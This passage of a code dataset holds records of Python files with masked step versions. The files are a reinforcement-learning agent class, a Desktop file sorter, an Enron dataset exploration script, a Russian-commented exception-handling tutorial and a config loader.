self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-5": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\n\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\n\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\n\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n #self.choices = choices\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n\n self.features = 0\n self.feature_len = feature_len\n # Global\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = self.reinforce_config.summaries_path + \"/\" + self.name\n\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n \n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)\n# self.target_model.eval_mode()\n\n self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,\n initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,\n initial_p=self.reinforce_config.starting_epsilon,\n final_p=self.reinforce_config.final_epsilon)\n\n# def __del__(self):\n# self.save()\n# self.summary.close()\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name,\n scalar_value=self.epsilon,\n global_step=self.steps)\n\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy = False, is_random = False):\n \n if self.learning:\n self.steps += 1\n # add to experience\n if self.previous_state is not None and self.learning and self.current_reward is not None:\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state_crr.reshape(-1, self.state_length), 0,\n self.features)\n# print(\"not final : {}\".format(self.current_reward) )\n# print(0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n# print(\"q_value : {}\".format(q_values))\n# input()\n if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:\n logger.debug(\"Replacing target model for %s\" % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n# self.target_model.eval_mode()\n\n if (self.learning and\n self.steps > self.reinforce_config.update_start and\n self.steps % self.reinforce_config.update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n\n self.current_reward = 0\n self.previous_state = state[action]\n #self.previous_action = action\n\n return choice, fv#,q_values\n\n def disable_learning(self, is_save = False):\n logger.info(\"Disabled Learning for %s agent\" % self.name)\n if is_save:\n# self.save()\n self.save(force = True)\n self.learning = False\n self.episode = 0\n \n def enable_learning(self):\n logger.info(\"enabled Learning for %s agent\" % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n# print(\"end:\")\n# print(self.current_reward)\n# input()\n episode_time = time.time() - self.episode_time\n\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n\n logger.info(\"End of Episode %d, \"\n \"Total reward %.2f, \"\n \"Epsilon %.2f\" % (self.episode + 1,\n self.total_reward,\n self.epsilon))\n\n logger.debug(\"Episode Time: %.2fs (%.2fs), \"\n \"Prediction Time: %.2f, \"\n \"Update Time %.2f\" % (episode_time,\n avg_time,\n self.prediction_time,\n self.update_time))\n\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward,\n global_step=self.episode)\n\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state.reshape(-1, self.state_length), 1,\n self.features)\n# print(\"final : {}\".format(self.current_reward) )\n# input()\n# print(1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + \"/adaptive.info\"\n if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:\n logger.info(\"Restoring state from %s\" % self.network_config.network_path)\n\n with open(restore_path, \"rb\") as file:\n info = pickle.load(file)\n\n self.steps = info[\"steps\"]\n# self.best_reward_mean = info[\"best_reward_mean\"]\n self.episode = info[\"episode\"]\n self.memory.load(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n\n def save(self, force=False, appendix=\"\"):\n info = {\n \"steps\": self.steps,\n \"best_reward_mean\": self.best_reward_mean,\n \"episode\": self.episode\n }\n \n if (len(self.reward_history) >= self.network_config.save_steps and\n self.episode % self.network_config.save_steps == 0) or force:\n\n total_reward = sum(self.reward_history[-self.network_config.save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n\n if force: #or current_reward_mean >= self.best_reward_mean:\n print(\"*************saved*****************\", current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info(\"Saving network. Found new best reward (%.2f)\" % total_reward)\n self.eval_model.save_network(appendix = appendix)\n self.target_model.save_network(appendix = appendix)\n# self.eval_model.save_network()\n# self.target_model.save_network()\n with open(self.network_config.network_path + \"/adaptive.info\", \"wb\") as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n else:\n logger.info(\"The best reward is still %.2f. Not saving\" % self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n \n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n# self.eval_model.train_mode()\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name,\n scalar_value=beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states,\n is_terminal, weights, batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes),\n global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector) = batch\n\n states = FloatTensor(states)\n# print(states.size())\n# next_states = FloatTensor(next_states)\n terminal = FloatTensor([1 if t else 0 for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size,\n dtype=torch.long)\n # Current Q Values\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n \n q_max.append(q_value_max)\n if self.network_config.version in [\"v10\", \"v11\"]:\n# print(features_max)\n# print(ns[idx, 63:67])\n# print(states[i, 63:67])\n# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), states.size())\n features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]\n features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]\n features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]\n features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]\n features_max[features_max == float('inf')] = 0\n# print(features_max)\n# input()\n f_max.append(features_max.view(-1))\n \n# if torch.sum(terminal == torch.sum(features_vector, dim = 1)) != len(terminal):\n# print(terminal)\n# print(features_vector)\n# input()\n q_max = torch.stack(q_max, dim = 1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n \n f_max = (1 - terminal.view(-1, 1)) * f_max\n \n q_target = reward + self.reinforce_config.discount_factor * q_max\n \n f_target = features_vector + self.reinforce_config.discount_factor * f_max\n \n# if torch.sum(reward).item() > 0:\n# print(reward)\n# print(feature_values)\n# print(q_target)\n# print(q_values)\n# input()\n # update model\n if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:\n\n# print(\"1\")\n# print(features_vector)\n# print(\"2\")\n# print(feature_values)\n# print(\"3\")\n# print(f_target)\n# print(\"4\")\n# print(f_max)\n# print(\"5\")\n# print(states.tolist())\n# input()\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n\n # Update priorities\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)",
"step-ids": [
11,
16,
19,
22,
23
]
}
|
[
11,
16,
19,
22,
23
] |
#This program sorts the files on Desktop on the basis of file extension and move them in separate folders in Documents folder.
desktop_directory="/home/vineeth/Desktop/" #LINUX
destination_folder="/home/vineeth/Documents/" #LINUX
#desktop_directory="C:/Users/VINEETH/Desktop/" #Windows
#destination_folder="C:/Users/VINEETH/Documents/" #Windows
exclude_these = ['.desktop','.exe','.lnk']
import os
for eachfile in os.listdir(desktop_directory):
if os.path.isfile(desktop_directory+eachfile):
fileName, fileExtension = os.path.splitext(eachfile)
if(all(fileExtension!=e for e in exclude_these)):
ext=fileExtension[1:]
if not os.path.exists(destination_folder+ext):
os.mkdir(destination_folder+ext)
os.rename(desktop_directory+eachfile,destination_folder+ext+"/"+eachfile)
|
normal
|
{
"blob_id": "805b64a7bd727a88081a6ead574fff9b1542070f",
"index": 2023,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory + eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if all(fileExtension != e for e in exclude_these):\n ext = fileExtension[1:]\n if not os.path.exists(destination_folder + ext):\n os.mkdir(destination_folder + ext)\n os.rename(desktop_directory + eachfile, destination_folder +\n ext + '/' + eachfile)\n",
"step-3": "desktop_directory = '/home/vineeth/Desktop/'\ndestination_folder = '/home/vineeth/Documents/'\nexclude_these = ['.desktop', '.exe', '.lnk']\n<mask token>\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory + eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if all(fileExtension != e for e in exclude_these):\n ext = fileExtension[1:]\n if not os.path.exists(destination_folder + ext):\n os.mkdir(destination_folder + ext)\n os.rename(desktop_directory + eachfile, destination_folder +\n ext + '/' + eachfile)\n",
"step-4": "desktop_directory = '/home/vineeth/Desktop/'\ndestination_folder = '/home/vineeth/Documents/'\nexclude_these = ['.desktop', '.exe', '.lnk']\nimport os\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory + eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if all(fileExtension != e for e in exclude_these):\n ext = fileExtension[1:]\n if not os.path.exists(destination_folder + ext):\n os.mkdir(destination_folder + ext)\n os.rename(desktop_directory + eachfile, destination_folder +\n ext + '/' + eachfile)\n",
"step-5": "#This program sorts the files on Desktop on the basis of file extension and move them in separate folders in Documents folder.\n\ndesktop_directory=\"/home/vineeth/Desktop/\" #LINUX\ndestination_folder=\"/home/vineeth/Documents/\" #LINUX\n\n#desktop_directory=\"C:/Users/VINEETH/Desktop/\" #Windows\n#destination_folder=\"C:/Users/VINEETH/Documents/\" #Windows\n\nexclude_these = ['.desktop','.exe','.lnk']\nimport os\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory+eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if(all(fileExtension!=e for e in exclude_these)):\n ext=fileExtension[1:]\n if not os.path.exists(destination_folder+ext):\n os.mkdir(destination_folder+ext)\n os.rename(desktop_directory+eachfile,destination_folder+ext+\"/\"+eachfile)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
"""
Starter code for exploring the Enron dataset (emails + finances);
loads up the dataset (pickled dict of dicts).
The dataset has the form:
enron_data["LASTNAME FIRSTNAME MIDDLEINITIAL"] = { features_dict }
{features_dict} is a dictionary of features associated with that person.
You should explore features_dict as part of the mini-project,
but here's an example to get you started:
enron_data["SKILLING JEFFREY K"]["bonus"] = 5600000
"""
import pickle
import math
enron_data = pickle.load(open("../final_project/final_project_dataset.pkl", "r"))
def print_it():
for x in enron_data:
print (x)
for y in enron_data[x]:
print (y,':',enron_data[x][y])
#print_it()
print "persons:", len(enron_data)
print "features:", len(enron_data["SKILLING JEFFREY K"])
pois = 0
for n in enron_data:
if enron_data[n]["poi"] == 1:
pois = pois + 1
print "nbr of poi:", pois
print "stock value James Prentice:", enron_data["PRENTICE JAMES"]["total_stock_value"]
print "Wesley Colwell sent mail to pois:", enron_data["COLWELL WESLEY"]["from_this_person_to_poi"], "times"
print "Jeffrey K Skilling exercised stock:", enron_data["SKILLING JEFFREY K"]["exercised_stock_options"]
print "money for Lay:", enron_data["LAY KENNETH L"]["total_payments"], ", Skilling:", enron_data["SKILLING JEFFREY K"]["total_payments"], " & Fastow:", enron_data["FASTOW ANDREW S"]["total_payments"]
salary = 0
email = 0
for n in enron_data:
if not enron_data[n]["salary"] == "NaN":
salary = salary + 1
if not enron_data[n]["email_address"] == "NaN":
email = email + 1
print "nbr of salary:", salary, ", email: ", email
total_pay = 0
for n in enron_data:
if enron_data[n]["total_payments"] == "NaN":
total_pay = total_pay + 1
print "% not salary:", (total_pay * 100 / len(enron_data)), ", ", total_pay
total_pay_pois = 0
for n in enron_data:
if enron_data[n]["poi"] == 1:
if enron_data[n]["total_payments"] == "NaN":
total_pay_pois = total_pay_pois + 1
print "% not salary & poi:", (total_pay_pois * 100 / pois)
|
normal
|
{
"blob_id": "c5d224a3d63d0d67bc7a48fecec156cca41cdcf7",
"index": 5129,
"step-1": "#!/usr/bin/python\n\n\"\"\" \n Starter code for exploring the Enron dataset (emails + finances);\n loads up the dataset (pickled dict of dicts).\n\n The dataset has the form:\n enron_data[\"LASTNAME FIRSTNAME MIDDLEINITIAL\"] = { features_dict }\n\n {features_dict} is a dictionary of features associated with that person.\n You should explore features_dict as part of the mini-project,\n but here's an example to get you started:\n\n enron_data[\"SKILLING JEFFREY K\"][\"bonus\"] = 5600000\n \n\"\"\"\n\nimport pickle\nimport math\n\nenron_data = pickle.load(open(\"../final_project/final_project_dataset.pkl\", \"r\"))\n\ndef print_it():\n for x in enron_data:\n print (x)\n for y in enron_data[x]:\n print (y,':',enron_data[x][y])\n\n#print_it()\n\nprint \"persons:\", len(enron_data)\nprint \"features:\", len(enron_data[\"SKILLING JEFFREY K\"])\n\npois = 0\nfor n in enron_data:\n if enron_data[n][\"poi\"] == 1:\n pois = pois + 1\n\nprint \"nbr of poi:\", pois\n\nprint \"stock value James Prentice:\", enron_data[\"PRENTICE JAMES\"][\"total_stock_value\"]\n\nprint \"Wesley Colwell sent mail to pois:\", enron_data[\"COLWELL WESLEY\"][\"from_this_person_to_poi\"], \"times\"\n\nprint \"Jeffrey K Skilling exercised stock:\", enron_data[\"SKILLING JEFFREY K\"][\"exercised_stock_options\"]\n\nprint \"money for Lay:\", enron_data[\"LAY KENNETH L\"][\"total_payments\"], \", Skilling:\", enron_data[\"SKILLING JEFFREY K\"][\"total_payments\"], \" & Fastow:\", enron_data[\"FASTOW ANDREW S\"][\"total_payments\"]\n\nsalary = 0\nemail = 0\nfor n in enron_data:\n if not enron_data[n][\"salary\"] == \"NaN\":\n salary = salary + 1\n if not enron_data[n][\"email_address\"] == \"NaN\":\n email = email + 1\n\nprint \"nbr of salary:\", salary, \", email: \", email\n\ntotal_pay = 0\nfor n in enron_data:\n if enron_data[n][\"total_payments\"] == \"NaN\":\n total_pay = total_pay + 1\n\nprint \"% not salary:\", (total_pay * 100 / len(enron_data)), \", \", total_pay\n\ntotal_pay_pois = 0\nfor n in enron_data:\n if enron_data[n][\"poi\"] == 1:\n if enron_data[n][\"total_payments\"] == \"NaN\":\n total_pay_pois = total_pay_pois + 1\n\nprint \"% not salary & poi:\", (total_pay_pois * 100 / pois)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# *** Обработка исключений (исключительные события, искл. ситуации)***
# генерация исключения
a=100
b=0
# "деление на ноль" - пример ошибки (не рабочий)
# c=a/b
# решение - обработка исключений (отлов исключения)
# конструкция "try-except"
# try:
# c = a / b
# print("Все отлично")
# except:
# # тут должен быть код, который срабатывает при исключительных ситуациях
# # т.е. "запасной" код
# print("Что-то пошло не так")
# c=a/1
# # тут может быть код который выполняется после предыдущего блока
# print("Result: ", c)
# обработка множества исключений
# result=None
# try:
# var = int(input("Введите число, но не ноль: "))
# result = 50/var
# # обработка исключения конкретного типа (класса)
# except ZeroDivisionError: # в данном примере тип исключения - ZeroDivisionError
# print("Вы попытались поделить на ноль!")
# result=50/1
# except ValueError as val_error: # в данном примере тип исключения - ValueError,
# print(f"По-моему, Вы ввели не число. Инфо: {val_error}")
# result=0
# # обработка общего (базового) исключения - отлавливает все исключения
# except Exception as err:
# print(f"Что-то пошло не так: {err}")
# print("Result: ", result)
# конструкция "try-except-finally"
# try:
# var=int(input("Введите число: "))
# c = 100/var
# print("Полет нормальный!")
# except ZeroDivisionError:
# c=0
# print("Попытка деления на ноль")
# finally:
# # finally срабатывает в любом случае, даже если программа завершится аварийно
# # т.е. тут должна быть критически важная логика
# print("Критически важное действие")
# print("Result", c)
# конструкция "try-except-finally"
try:
var=int(input("Введите число: "))
c = 100/var
print("Полет нормальный!")
except ZeroDivisionError:
c=0
print("Попытка деления на ноль")
else:
#else срабатывает только тогда, когда нет исключений
print("Логика, которая выполняется только если нет исключений")
finally:
# finally срабатывает в любом случае, даже если программа завершится аварийно
# т.е. тут должна быть критически важная логика
print("Критически важное действие")
print("Result", c)
|
normal
|
{
"blob_id": "bb02ba68eb6629dad364b5f015680e4126e655f3",
"index": 6173,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n var = int(input('Введите число: '))\n c = 100 / var\n print('Полет нормальный!')\nexcept ZeroDivisionError:\n c = 0\n print('Попытка деления на ноль')\nelse:\n print('Логика, которая выполняется только если нет исключений')\nfinally:\n print('Критически важное действие')\nprint('Result', c)\n",
"step-3": "a = 100\nb = 0\ntry:\n var = int(input('Введите число: '))\n c = 100 / var\n print('Полет нормальный!')\nexcept ZeroDivisionError:\n c = 0\n print('Попытка деления на ноль')\nelse:\n print('Логика, которая выполняется только если нет исключений')\nfinally:\n print('Критически важное действие')\nprint('Result', c)\n",
"step-4": "# *** Обработка исключений (исключительные события, искл. ситуации)***\n\n# генерация исключения\na=100\nb=0\n\n# \"деление на ноль\" - пример ошибки (не рабочий)\n# c=a/b\n\n# решение - обработка исключений (отлов исключения)\n# конструкция \"try-except\"\n\n# try:\n# c = a / b\n# print(\"Все отлично\")\n# except:\n# # тут должен быть код, который срабатывает при исключительных ситуациях\n# # т.е. \"запасной\" код\n# print(\"Что-то пошло не так\")\n# c=a/1\n\n# # тут может быть код который выполняется после предыдущего блока\n# print(\"Result: \", c)\n\n\n# обработка множества исключений\n\n# result=None\n\n# try:\n# var = int(input(\"Введите число, но не ноль: \"))\n# result = 50/var\n# # обработка исключения конкретного типа (класса)\n# except ZeroDivisionError: # в данном примере тип исключения - ZeroDivisionError\n# print(\"Вы попытались поделить на ноль!\")\n# result=50/1\n# except ValueError as val_error: # в данном примере тип исключения - ValueError, \n# print(f\"По-моему, Вы ввели не число. Инфо: {val_error}\")\n# result=0\n\n# # обработка общего (базового) исключения - отлавливает все исключения\n# except Exception as err:\n# print(f\"Что-то пошло не так: {err}\")\n\n# print(\"Result: \", result)\n\n\n# конструкция \"try-except-finally\"\n\n# try:\n# var=int(input(\"Введите число: \"))\n# c = 100/var\n# print(\"Полет нормальный!\")\n# except ZeroDivisionError:\n# c=0\n# print(\"Попытка деления на ноль\")\n# finally:\n# # finally срабатывает в любом случае, даже если программа завершится аварийно\n# # т.е. тут должна быть критически важная логика\n# print(\"Критически важное действие\")\n\n# print(\"Result\", c)\n\n# конструкция \"try-except-finally\"\n\ntry:\n var=int(input(\"Введите число: \"))\n c = 100/var\n print(\"Полет нормальный!\")\nexcept ZeroDivisionError:\n c=0\n print(\"Попытка деления на ноль\")\nelse: \n #else срабатывает только тогда, когда нет исключений\n print(\"Логика, которая выполняется только если нет исключений\")\nfinally:\n # finally срабатывает в любом случае, даже если программа завершится аварийно\n # т.е. тут должна быть критически важная логика\n print(\"Критически важное действие\")\n\nprint(\"Result\", c)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import sys
from string import ascii_letters, digits
from ConfigParser import SafeConfigParser
# copied from utils, avoid circular reference fun :)
def mk_boolean(value):
if value is None:
return False
val = str(value)
if val.lower() in [ "true", "t", "y", "1", "yes" ]:
return True
else:
return False
def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
''' return a configuration variable with casting '''
value = _get_config(p, section, key, env_var, default)
if boolean:
return mk_boolean(value)
if value and integer:
return int(value)
if value and floating:
return float(value)
if value and islist:
return [x.strip() for x in value.split(',')]
return value
def _get_config(p, section, key, env_var, default):
''' helper function for get_config '''
if env_var is not None:
value = os.environ.get(env_var, None)
if value is not None:
return value
if p is not None:
try:
return p.get(section, key, raw=True)
except:
return default
return default
def load_config_file():
''' Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner '''
p = SafeConfigParser()
path0 = os.getenv("SOJOURNER_CONFIG", None)
if path0 is not None:
path0 = os.path.expanduser(path0)
path1 = os.getcwd() + "/sojourner.cfg"
path2 = os.path.expanduser("~/.sojourner.cfg")
path3 = "/etc/sojourner/sojourner.cfg"
for path in [path0, path1, path2, path3]:
if path is not None and os.path.exists(path):
try:
p.read(path)
except configparser.Error as e:
print("Error reading config file: \n{0}".format(e))
sys.exit(1)
return p
return None
def shell_expand_path(path):
''' shell_expand_path is needed as os.path.expanduser does not work
when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE '''
if path:
path = os.path.expanduser(os.path.expandvars(path))
return path
p = load_config_file()
active_user = pwd.getpwuid(os.geteuid())[0]
# sections in config file
DEFAULTS='defaults'
# configurable things
# def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
DEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS, 'sojourner_home','DEFAULT_SOJOURNER_HOME',os.environ['HOME']+'/Sojourner'))
DEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine', 'SOJOURNER_DB_ENGINE', 'sqlite')
DEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST', 'localhost')
DEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT', '3306')
DEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER', 'sojourner')
DEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd', 'SOJOURNER_DB_PASSWD', 'sojourner')
DEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname', 'SOJOURNER_DB_DBNAME', 'sojourner')
SOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner', 'SOJOURNER_PROVISIONER', 'ansible')
# ANSIBLE RELATED
SOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles', 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')
# CHEF RELATED
SOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks', 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')
|
normal
|
{
"blob_id": "63bd8a15dd489844968f46c4b0ffe157d567537a",
"index": 8044,
"step-1": "<mask token>\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in ['true', 't', 'y', '1', 'yes']:\n return True\n else:\n return False\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\n<mask token>\n",
